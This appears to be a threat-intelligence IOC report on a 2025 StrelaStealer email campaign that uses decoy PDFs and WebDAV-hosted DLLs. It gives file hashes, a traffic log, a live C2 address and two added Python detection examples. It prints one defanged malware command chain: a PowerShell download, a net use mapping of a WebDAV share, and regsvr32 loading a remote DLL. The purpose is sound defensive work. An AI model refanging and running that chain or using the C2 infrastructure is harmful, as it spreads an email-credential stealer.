2025-02-10-IOCs-for-StrelaStealer-activity.txt
2025-02-10 (MONDAY): RECENT STRELASTEALER INFECTION CHAIN INVOLVES DECOY PDF FILES
AUTHOR:
- Vishwa Thothathri
REFERENCES:
- https://www.linkedin.com/posts/unit42_strelastealer-malspam-webdav-activity-7295144078428491776-vyqY/
- https://x.com/Unit42_Intel/status/1889378454287581678
NOTES:
- Recent StrelaStealer activity continues to use WebDAV servers to host malware.
- Since the end of January 2025, we have begun seeing decoy PDF files used during the infection process.
- The WebDAV and C2 server at 193.143.1[.]205 is still actively hosting the decoy PDF and StrelaStealer malware as of Monday 2025-02-10.
- The decoy PDF is not malicious, but it contains a blurred image and serves as a misdirection for potential victims.
- The .js files only execute if the victim's Windows host uses the following languages and locales:
- German (Austria)
- German (Germany)
- German (Liechtenstein)
- German (Luxembourg)
- German (Switzerland)
RECENT INFECTION CHAIN:
- email --> attached zip archive --> extracted JavaScript (.js) file --> wscript.exe runs .js file if double-clicked:
-- Script generates a PowerShell command to retrieve and open a decoy PDF document.
-- Script also runs a command line in the background to execute a StrelaStealer DLL hosted on a WebDAV server.
BACKGROUND:
- First identified in 2022, StrelaStealer is an information stealer that focuses on email clients [1].
- We've reported about StrelaStealer before, including an early 2024 campaign targeting the EU and the US [2].
- StrelaStealer continues to be distributed through email attachments of zip archives containing JS files.
- However, by late 2024, the infection chain had moved to StrelaStealer DLLs hosted on WebDAV servers [3].
[1] https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc
[2] https://unit42.paloaltonetworks.com/strelastealer-campaign/
[3] https://cyble.com/blog/strela-stealer-targets-europe-stealthily-via-webdav/
10 EXAMPLES OF ZIP ARCHIVES (READ: SHA256 HASH - CONTENT MODIFIED DATE):
10 EXAMPLES OF EXTRACTED JS FILES (READ: SHA256 HASH - FILE NAME):
EXAMPLE OF SCRIPT GENERATED BY A .JS FILE TO LOAD/OPEN DECOY PDF DOCUMENT AND RUN STRELASTEALER:
- cmd /c powershell.exe -Command
"Invoke-WebRequest -OutFile %temp%\\invoice.pdf hxxp[:]//193.143.1[.]205/invoice.php" &&
start %temp%\\invoice.pdf &&
cmd /c net use \\\\193.143.1[.]205@8888\\davwwwroot\\ &&
cmd /c regsvr32 /s \\\\193.143.1[.]205@8888\\davwwwroot\\281681957614368.dll
- Note: The DLL file name is different for each .js sample.
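Added example (not part of the original report): a small endpoint detection over process command lines that flags the three components of the script above, i.e. a PowerShell download to %temp%, a "net use" mapping of a WebDAV share in the \\host@port\davwwwroot form, and regsvr32 loading a DLL from that share. The sample command line is the one from the report with the JavaScript string escaping removed and the defanging kept; refang() undoes the defanging so the same patterns match real telemetry. Rule names and the scoring are assumptions of this example.

```python
import re

# Constructed sample: the report's command line, defanged as in the report, JS escaping removed.
SAMPLE_CMD = (
    r'cmd /c powershell.exe -Command "Invoke-WebRequest -OutFile %temp%\invoice.pdf '
    r'hxxp[:]//193.143.1[.]205/invoice.php" && start %temp%\invoice.pdf && '
    r'cmd /c net use \\193.143.1[.]205@8888\davwwwroot\ && '
    r'cmd /c regsvr32 /s \\193.143.1[.]205@8888\davwwwroot\281681957614368.dll'
)

DEFANG = [("hxxp", "http"), ("[.]", "."), ("[:]", ":")]


def refang(s: str) -> str:
    """Undo report-style defanging so the rules match what real process telemetry shows."""
    for a, b in DEFANG:
        s = s.replace(a, b)
    return s


# Windows WebClient UNC form: \\host@port\davwwwroot\...  (a port in the host part means WebDAV, not SMB)
WEBDAV_UNC = re.compile(r"\\\\(?P<host>[\w.-]+)@(?P<port>\d+)(?:@ssl)?\\davwwwroot\\", re.I)

RULES = {  # hypothetical rule names for this example
    "regsvr32_dll_from_webdav": re.compile(
        r"regsvr32(?:\.exe)?\s+(?:/\w+\s+)*\\\\[\w.-]+@\d+(?:@ssl)?\\davwwwroot\\\S+\.dll", re.I),
    "net_use_webdav_share": re.compile(r"\bnet\s+use\s+\\\\[\w.-]+@\d+(?:@ssl)?\\", re.I),
    "powershell_download_to_temp": re.compile(r"Invoke-WebRequest\b.*-OutFile\s+%temp%\\", re.I),
}


def analyze_command_line(cmd: str) -> dict:
    """Return which rules hit, the WebDAV server extracted from the UNC path, and a simple score."""
    cmd = refang(cmd)
    hits = {name: bool(rx.search(cmd)) for name, rx in RULES.items()}
    m = WEBDAV_UNC.search(cmd)
    return {
        "hits": hits,
        "webdav_host": m.group("host") if m else None,
        "webdav_port": int(m.group("port")) if m else None,
        "score": sum(hits.values()),  # 3 = full decoy-PDF + WebDAV DLL chain seen in this campaign
    }


if __name__ == "__main__":
    print(analyze_command_line(SAMPLE_CMD))
```

In practice the rules are most useful when paired with the parent process, since in this chain the command line is spawned by wscript.exe running the .js file.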
TWO EXAMPLES OF SHA256 HASHES FOR DECOY PDF DOCUMENTS:
- 915c9d78cf65c4be89eda22e5f03d44d6a593bc4be02fa816871d8ee398ca8fa
- fc3518d746cdb3738da976551795b9727619f41f89ac0641533126e2f69b969a
THREE EXAMPLES OF STRELASTEALER DLL FILES (READ: SHA256 HASH - FIRST SEEN DATE):
- 0e8e0a57a3cc02c8666378463e1bde1697c3e6bb14e5b773f644e06ea05ab41c - 2025-01-27
- cc773750eff260dc5396f878e3a61f5a79689e0078e8b679b3152f7af027a429 - 2025-02-10
- f3677f29dee7338da89321564757caa15ce0c50f85540977b7470bf3a6ca0d2c - 2025-01-23
EXAMPLE OF INFECTION TRAFFIC GENERATED ON 2025-02-10:
- Note: We used the .js file with a SHA256 hash of 2e76869289964a9025f8dc20c9f4ce0c341a7b0305c3906e717c812af4efff88 from 2025-01-31 to generate this traffic.
Date/Time IP address port Host HTTP request
----------------------- --------------- ---- -------------------- ---------------------------------------
2025-02-10 23:49:38 UTC 193.143.1[.]205 80 193.143.1[.]205 GET /invoice.php HTTP/1.1
2025-02-10 23:49:40 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 OPTIONS / HTTP/1.1
2025-02-10 23:49:43 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 OPTIONS / HTTP/1.1
2025-02-10 23:49:44 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 PROPFIND / HTTP/1.1
2025-02-10 23:49:44 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 PROPFIND / HTTP/1.1
2025-02-10 23:49:45 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 PROPFIND /281681957614368.dll HTTP/1.1
2025-02-10 23:49:46 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 GET /281681957614368.dll HTTP/1.1
2025-02-10 23:49:47 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 PROPFIND /281681957614368.dll HTTP/1.1
2025-02-10 23:50:04 UTC 193.143.1[.]205 80 193.143.1[.]205 POST /up.php HTTP/1.1
2025-02-10 23:50:14 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 PROPPATCH /281681957614368.dll HTTP/1.1
2025-02-10 23:50:15 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 PROPPATCH /281681957614368.dll HTTP/1.1
2025-02-10 23:50:20 UTC 193.143.1[.]205 80 193.143.1[.]205 POST /up.php HTTP/1.1
2025-02-10 23:50:21 UTC 193.143.1[.]205 80 193.143.1[.]205 POST /up.php HTTP/1.1
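Added example (not part of the original report): a parser for rows in the format of the traffic table above, plus a detection that looks for the sequence the table shows, i.e. WebDAV methods (OPTIONS/PROPFIND) to a server, a GET of a .dll over that same WebDAV port, and a later POST to the same server (the /up.php C2 check-in). The sample rows are copied from the table with the defanged IP kept; the chain criteria and output fields are assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: a subset of the report's traffic table rows, IP kept defanged as in the report.
SAMPLE_LOG = """\
2025-02-10 23:49:38 UTC 193.143.1[.]205 80 193.143.1[.]205 GET /invoice.php HTTP/1.1
2025-02-10 23:49:40 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 OPTIONS / HTTP/1.1
2025-02-10 23:49:44 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 PROPFIND / HTTP/1.1
2025-02-10 23:49:45 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 PROPFIND /281681957614368.dll HTTP/1.1
2025-02-10 23:49:46 UTC 193.143.1[.]205 8888 193.143.1[.]205:8888 GET /281681957614368.dll HTTP/1.1
2025-02-10 23:50:04 UTC 193.143.1[.]205 80 193.143.1[.]205 POST /up.php HTTP/1.1
"""

ROW = re.compile(r"^(?P<ts>\S+ \S+) UTC (?P<ip>\S+) (?P<port>\d+) (?P<host>\S+) "
                 r"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/")
WEBDAV_METHODS = {"OPTIONS", "PROPFIND", "PROPPATCH", "MKCOL", "MOVE", "LOCK", "UNLOCK"}


def parse_rows(text: str) -> list:
    """Parse table rows into dicts; refang the IP and parse the timestamp so rows can be ordered."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # header/separator lines are skipped
        d = m.groupdict()
        d["ip"] = d["ip"].replace("[.]", ".")
        d["port"] = int(d["port"])
        d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S")
        rows.append(d)
    return rows


def find_webdav_dll_chains(rows: list) -> list:
    """Per server IP: WebDAV traffic on a port, a GET of a .dll on that port, then a later POST to the IP."""
    by_ip = defaultdict(list)
    for r in rows:
        by_ip[r["ip"]].append(r)
    findings = []
    for ip, rs in by_ip.items():
        dav_ports = {r["port"] for r in rs if r["method"] in WEBDAV_METHODS}
        for g in rs:
            if g["method"] != "GET" or g["port"] not in dav_ports or not g["path"].lower().endswith(".dll"):
                continue
            posts = sorted((r for r in rs if r["method"] == "POST" and r["ts"] > g["ts"]), key=lambda r: r["ts"])
            if posts:
                findings.append({"ip": ip, "dav_port": g["port"], "dll": g["path"],
                                 "first_post": posts[0]["path"], "post_port": posts[0]["port"]})
    return findings


if __name__ == "__main__":
    print(find_webdav_dll_chains(parse_rows(SAMPLE_LOG)))
```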